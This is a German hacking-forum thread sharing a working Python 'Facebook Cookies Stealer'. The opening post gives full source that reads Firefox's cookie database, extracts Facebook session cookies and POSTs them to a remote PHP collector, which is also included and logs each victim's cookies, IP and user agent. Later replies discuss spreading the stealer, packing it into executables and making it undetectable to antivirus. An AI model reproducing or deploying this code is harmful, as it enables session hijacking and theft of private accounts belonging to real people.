Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

(PHYTON) Facebook Cookies Stealer

- - - - -

  • Bitte melde dich an um zu Antworten
11 Antworten in diesem Thema

#1
Xoom420

Xoom420

    Noob

  • Banned
  • PIPPIP
  • Likes
    0
  • 4 Beiträge
  • 0 Bedankt

Hier meine Hackerfreunde :)

 

Dachte ich teile mal hier was bei Toolbase um aktiver zu werden, für dieses Script benötigt Ihr Python.

 

Hinterlasst doch ein Feedback für die anderen Users und ein Danke wäre nett :)

 

Source:

import os
import sqlite3
import fnmatch
import requests
import platform
 
#Php Interceptor to receive the cookies
WEB_SHELL = 'http://www.fbi.gov/-/-/l.php' #Link of Your Php Interceptor
 
#The Php Interceptor Code :
 
#<?php
#Coded By Mauritania Attacker
 
#$c_user=$_REQUEST['c_user'];
#$datr=$_REQUEST['datr'];
#$xs=$_REQUEST['xs'];
 
#if(!empty($c_user))
#{
#$myfile=fopen("ag_cookie.txt",'a+');
#$date= date("d-m-Y h:i:sa");
#$client_ip=$_SERVER['REMOTE_ADDR'];
#$UA = $_SERVER['HTTP_USER_AGENT'];
 
#fwrite($myfile,"Logged At ="$date."\n");
#fwrite($myfile,"Profile = https://www.facebook.com/profile.php?id=".$c_user."\n");
#fwrite($myfile,"Picture = https://graph.facebook.com/".$c_user."/picture?type=large\n");
#fwrite($myfile,"Client ip = ".$client_ip."\n");
#fwrite($myfile,"Useragent = ".$UA."\n");
#fwrite($myfile,"datr = ".$datr."\n");
#fwrite($myfile,"xs = ".$xs."\n");
#fwrite($myfile,"----------------------------------\n\n");
#fclose($myfile);
 
#}
#else{
#    header('location:http://your-website.com');
#}
 
#?>
#Host you Php Interceptor via a Server \!/
 
class FbCookie():
 
    def greb_db_path(self):
        #Linux OS
        if platform.system() == 'Linux':
            path = os.getenv('HOME')+"/.mozilla/firefox/"
            folder = os.listdir(path)
            for file in folder:
                if fnmatch.fnmatch(file, '*.default'):  
                    path = path+file+"/cookies.sqlite"
            return str(path)
        #Win OS
        if platform.system() == 'Windows':
            path = os.getenv('APPDATA')+"\\Mozilla\\Firefox\\Profiles\\"
            folder = os.listdir(path)
            for f in folder:
                cookie_folder = f
            path = path+cookie_folder+"\cookies.sqlite"
            return str(path)
 
 
    def post_to_shell(self, data_to_send):
        headers = {'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3'}
        payload = {'c_user': data_to_send[0], 'datr': data_to_send[1], 'xs': data_to_send[2]}
        req = requests.post(WEB_SHELL, headers=headers, data=payload)
 
    def greb_cookies_from_db(self):
        data_to_send = []
        db_path = self.greb_db_path()
       
        conn = sqlite3.connect(db_path)
        c = conn.cursor()
 
        #Query to check if there is any session stored
        c.execute("select count(*) from moz_cookies where baseDomain='facebook.com' and name='c_user'")
        for data in c.fetchall():
            count = data[0]
 
        #If have a session stored, grab and send to your Interceptor
        if count == 1:
            c.execute("select value from moz_cookies where baseDomain='facebook.com' and name='c_user'")
 
            for data in c.fetchall():
                c_user = str(data[0])
                data_to_send.append(c_user)
 
            c.execute("select value from moz_cookies where baseDomain='facebook.com' and name='datr'")
            for data in c.fetchall():
                datr = str(data[0])
                data_to_send.append(datr)
 
            c.execute("select value from moz_cookies where baseDomain='facebook.com' and name='xs'")
            for data in c.fetchall():
                xs = str(data[0])
                data_to_send.append(xs)
 
            self.post_to_shell(data_to_send)
           
 
def main():
    x = FbCookie()
    x.greb_cookies_from_db()
 
if __name__ == '__main__':
    main()


#2
pi^2

pi^2

    Hacker

  • Premium Member
  • Likes
    273
  • 181 Beiträge
  • 46 Bedankt

Das Script liest den Cookie lokal aus der Firefox Datenbank aus. Dann kann man ja gleich gespeicherte Passwörter transferieren oder einfach einen Keylogger installieren.

Mir erschließt sich nicht ganz der Nutzen hinter diesem Script.



#3
Haxlor

Haxlor

    Pentester

  • Premium Member
  • Likes
    30
  • 102 Beiträge
  • 30 Bedankt
  • 123456
  • Spender

Das Doch eins zu eins von apex oder Attacker .... :-) 

Changing the code won't make you the coder 

 

Please Login HERE or Register HERE to see this link!


  • blue_eyed_devil gefällt das

Eingefügtes Bild


#4
Xoom420

Xoom420

    Noob

  • Banned
  • PIPPIP
  • Likes
    0
  • 4 Beiträge
  • 0 Bedankt

Das Doch eins zu eins von apex oder Attacker .... :-) 

Changing the code won't make you the coder 

 

Please Login HERE or Register HERE to see this link!

Habe Ich gesagt das es von mir ist? Ich bin kein Coder.



#5
Haxlor

Haxlor

    Pentester

  • Premium Member
  • Likes
    30
  • 102 Beiträge
  • 30 Bedankt
  • 123456
  • Spender

alles gut war keine Anschuldigung chill mal deine base 


  • blue_eyed_devil gefällt das

Eingefügtes Bild


#6
Framerater

Framerater

    Anti-Spam Bot

  • Elite Member
  • Likes
    398
  • 414 Beiträge
  • 224 Bedankt
  • 9737064
  • Android, Android [root], iPhone
  • Windows, Linux

Habe Ich gesagt das es von mir ist? Ich bin kein Coder.

 

Dann schreib das nächstes Mal auch rein, es liest sich nämlich so, als hättest du deinen eigenen Code hochgeladen!

 

MfG,

 

Framerater


Als mein letzter Läufer busted wurde... haben sie nicht vor der Packstation gewartet... sondern in der Packstation, im Paket! Also VORSICHT ist angesagt!

#7
B1nary

B1nary

    Samurai

  • Elite Member
  • Likes
    489
  • 506 Beiträge
  • 346 Bedankt

Klassischer Stealer eben. Aber wer führt ein Python-Script ungeprüft aus bzw. wie sollte man diesen Stealer binden und spreaden?!



#8
3xc3ll3nt

3xc3ll3nt

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    27
  • 26 Beiträge
  • 4 Bedankt
  • Android [root]
  • Windows, Linux, Mac OS

Klassischer Stealer eben. Aber wer führt ein Python-Script ungeprüft aus bzw. wie sollte man diesen Stealer binden und spreaden?!

 

Wozu gibt es denn

Please Login HERE or Register HERE to see this link!

oder

Please Login HERE or Register HERE to see this link!

?


  • smc2014 gefällt das

Ich bin weder dieser 3xc3ll3nt noch dieser 3xc3ll3nt noch dieser 3xc3ll3nt noch dieser 3xc3ll3nt noch sonst irgendein 3xc3ll3nt.


#9
pi^2

pi^2

    Hacker

  • Premium Member
  • Likes
    273
  • 181 Beiträge
  • 46 Bedankt

Wozu gibt es denn

Please Login HERE or Register HERE to see this link!

oder

Please Login HERE or Register HERE to see this link!

?

 

Die pushen die kompillierte Executable schnell mal auf 5MB wegen der ganzen Depencies und Libraries..

 

Genau für solche Sachen eignet sich Python als Scriptsprache nicht!

Das lässt sich auch via pure C schnell anfertigen und erzeugt nach dem kompillieren eine viell. 150 KB große Datei.



#10
B1nary

B1nary

    Samurai

  • Elite Member
  • Likes
    489
  • 506 Beiträge
  • 346 Bedankt

Wozu gibt es denn

Please Login HERE or Register HERE to see this link!

oder

Please Login HERE or Register HERE to see this link!

?

 

Jup, schon. Aber grade bei Py2Exe gibt's gerne mal Detections, mal abgesehen von dem Problem, dass pi² genannt hat. Müsste man mal ausprobieren, ob die generierten Exe cryptable und danach fud sind.



#11
3xc3ll3nt

3xc3ll3nt

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    27
  • 26 Beiträge
  • 4 Bedankt
  • Android [root]
  • Windows, Linux, Mac OS

Die pushen die kompillierte Executable schnell mal auf 5MB wegen der ganzen Depencies und Libraries..

 

Genau für solche Sachen eignet sich Python als Scriptsprache nicht!

Das lässt sich auch via pure C schnell anfertigen und erzeugt nach dem kompillieren eine viell. 150 KB große Datei.

 

Warum stören dich die 5MB?

Und wenn schon, ist ja schön wenns in der Theorie funktioniert. Das Tolle daran ist ja dass es jeder sofot kapiert, möchte man es professionell umsetzen kann man jede Sprache verwenden die man möchte.


Ich bin weder dieser 3xc3ll3nt noch dieser 3xc3ll3nt noch dieser 3xc3ll3nt noch dieser 3xc3ll3nt noch sonst irgendein 3xc3ll3nt.


#12
pi^2

pi^2

    Hacker

  • Premium Member
  • Likes
    273
  • 181 Beiträge
  • 46 Bedankt

Warum stören dich die 5MB?

Und wenn schon, ist ja schön wenns in der Theorie funktioniert. Das Tolle daran ist ja dass es jeder sofot kapiert, möchte man es professionell umsetzen kann man jede Sprache verwenden die man möchte.

 

Jenachdem was du anstellen möchtest kann die Größe von Belang sein (eine 5MB große Binary habe ich z.B. kaum gesehen und ist etwas unhandlich; Größenlimitierung Attachments, DL-Rate, auffällig etc.). Zudem Pyinstaller und co. den Source nur packt! und nicht kompiliert (Python wird interpretiert) -> ziemlich einfach an Source zu gelangen, C&C Server etc..

 

Und klar kann man mit jeder Programmier/Script- sprache alles umsetzen. Nur hat jede seine Vor- und Nachteile und mit Python Binaries zu bauen spricht eher gegen das Konzept und den Vorteil in der Anwendung von Python.


  • Framerater, B1nary und 3xc3ll3nt gefällt das



  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 80 user(s)


    _)_, 187ers, 3eyes, 3xc3ll3nt, aintNEEDaNAME, B1nary, bebekid32, Bl4ck3d, Blackrock, blue_eyed_devil, Born2Hack, clusterhead, Crowx88, cubik, CyberFlash, dev-0, Dr. Spic, excore, exploitablerootkit, Exynos, Framerater, FrogPussyGreen, gtawelt, gutzuu, hacke2010, hacked, hanshenkelman, Hansiberg, Haxlor, hlaus777, Jackdaniels, JohnJaztime, JohnR, kaiz0r, Kozuki, leonalexkraus, loginman1, m0nk3y, macinchris, mantwohouse, Mofug, Mr1337speak, nginx, nibble nibble, nicksmile, nischke, Nissan300zx, NoNameMT, NSK, PadX18, PaulaAbdul, peppi200, Peter0Gru, Petrisun, pi^2, polytox, pornoralle, PriX, pwcca, Pyerun, Rico1980, Sash1, Sayco, Silent0wn3r, sitb, SkullSplitter, smc2014, sniffer, TheLoneWolf, Toskom4n, twixeis, Volle29, Xantar, Xenio, Xenos88, Xoom420, Xpit, XPosed, xVirtu, Zerobyte
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.